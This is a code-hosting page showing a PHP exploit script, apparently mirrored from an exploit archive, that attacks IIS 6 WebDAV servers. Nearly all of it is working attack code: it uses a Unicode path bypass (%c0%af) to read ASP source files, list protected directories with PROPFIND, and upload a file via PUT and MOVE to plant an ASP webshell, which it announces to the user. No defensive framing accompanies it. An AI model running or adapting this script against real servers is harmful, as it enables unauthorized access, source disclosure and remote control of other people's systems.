PageRenderTime 50ms CodeModel.GetById 23ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/windows/remote/8765.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 97 lines | 82 code | 12 blank | 3 comment | 11 complexity | 30113fab3e1c6b892af93b9b8bf6dbe9 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?

    2. 

  2. 

    3. 

  3. print_r('

    4. 

  4. ********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********

    5. 

  5.                                                          

    6. 

  6.        Usage: php '.$argv[0].' source/path/put host path    

    7. 

  7.        Example: php '.$argv[0].' source www.tian6.com /blog/readme.asp        

    8. 

  8.        Example2: php '.$argv[0].' path www.tian6.com /secret/

    9. 

  9.        Example3: php '.$argv[0].' put www.tian6.com /secret/ test.txt(evil code as test.txt)

    10. 

  10. ****************************************************************

    11. 

  11. ');

    12. 

  12. 

    13. 

  13. //verification du debut

    14. 

  14. if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}

    15. 

  15. else {$action=$argv[1];}

    16. 

  16. 

    17. 

  17. if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}

    18. 

  18. else{$host=$argv[2];}

    19. 

  19. 

    20. 

  20. if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}

    21. 

  21. else{$path=$argv[3];}

    22. 

  22. 

    23. 

  23. 

    24. 

  24. //sent

    25. 

  25. function sent($sock)   

    26. 

  26. {   

    27. 

  27. global  $host, $html;   

    28. 

  28. $ock=fsockopen(gethostbyname($host),'80');   

    29. 

  29. if (!$ock) {   

    30. 

  30. echo 'No response from '.$host; die;   

    31. 

  31. }   

    32. 

  32. fputs($ock,$sock);   

    33. 

  33. $html='';   

    34. 

  34. while (!feof($ock)) {   

    35. 

  35. $html.=fgets($ock);   

    36. 

  36. }   

    37. 

  37. fclose($ock);   

    38. 

  38. }   

    39. 

  39. 

    40. 

  40. if($action=="source"){

    41. 

  41. 	$position=strrpos($path,"/");

    42. 

  42.     $path=substr_replace($path,"%c0%af/",$position,1);

    43. 

  43. 	$sock="GET ".$path." HTTP/1.1\r\n";

    44. 

  44.     $sock.="Translate: f\r\n";

    45. 

  45. 	$sock.="Host: ".$host."\r\n";

    46. 

  46.     $sock.="Connection:close\r\n\r\n";

    47. 

  47. 	sent($sock);

    48. 

  48. 	echo $html;

    49. 

  49. 	die;

    50. 

  50. 	}

    51. 

  51. 

    52. 

  52. 

    53. 

  53. if($action=="path"){

    54. 

  54. 	$position=strrpos($path,"/");

    55. 

  55.     $path=substr_replace($path,"%c0%af",$position,0);

    56. 

  56. 	$sock="PROPFIND  ".$path." HTTP/1.1\r\n";

    57. 

  57. 	$sock.="Host: ".$host."\r\n";

    58. 

  58.     $sock.="Connection:close\r\n";

    59. 

  59. 	$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";

    60. 

  60. 	$sock.="Content-Length: 0\r\n\r\n";

    61. 

  61.     $sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>';

    62. 

  62.     sent($sock);

    63. 

  63. 	$bur=explode("<a:href>",$html);

    64. 

  64.     foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";}

    65. 

  65.     echo $resultat;

    66. 

  66. 	die;

    67. 

  67.     }

    68. 

  68. 

    69. 

  69. 

    70. 

  70. if($action=="put"){

    71. 

  71. 	echo "Remember,keep urfile in type txt!\r\n\r\n";

    72. 

  72.      $fp = fopen("test.txt", 'r');

    73. 

  73. 	 if($fp!=false){

    74. 

  74.      while (false!==($char = fgets($fp))) {

    75. 

  75.      $fir1 .= $char;    # fix: hoahongtim Team: hvaonline.net

    76. 

  76.      }

    77. 

  77.      fclose($fp);

    78. 

  78. 	$position=strrpos($path,"/");

    79. 

  79.     $path=substr_replace($path,"%c0%af",$position,0);

    80. 

  80.     $sock="PUT ".$path."test.txt HTTP/1.1\r\n";

    81. 

  81. 	$sock.="Host: ".$host."\r\n";

    82. 

  82. 	$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";

    83. 

  83. 	$sock.="Connection:close\r\n";

    84. 

  84. 	$sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";

    85. 

  85.     $sock.="".$fir1."\r\n";

    86. 

  86.    	echo $sock; sent($sock);sleep(2);

    87. 

  87. 	$sock="MOVE ".$path."test.txt HTTP/1.1\r\n";

    88. 

  88.     $sock.="Host: ".$host."\r\n";

    89. 

  89.     $sock.="Connection:close\r\n";

    90. 

  90. 	$sock.="Destination: ".$path."racle.asp\n\n";

    91. 

  91.     sent($sock);

    92. 

  92. 	echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";

    93. 

  93. 	die;}

    94. 

  94. 	else{die;}

    95. 

  95. 	}

    96. 

  96. 

    97. 

  97. # milw0rm.com [2009-05-22]
    98.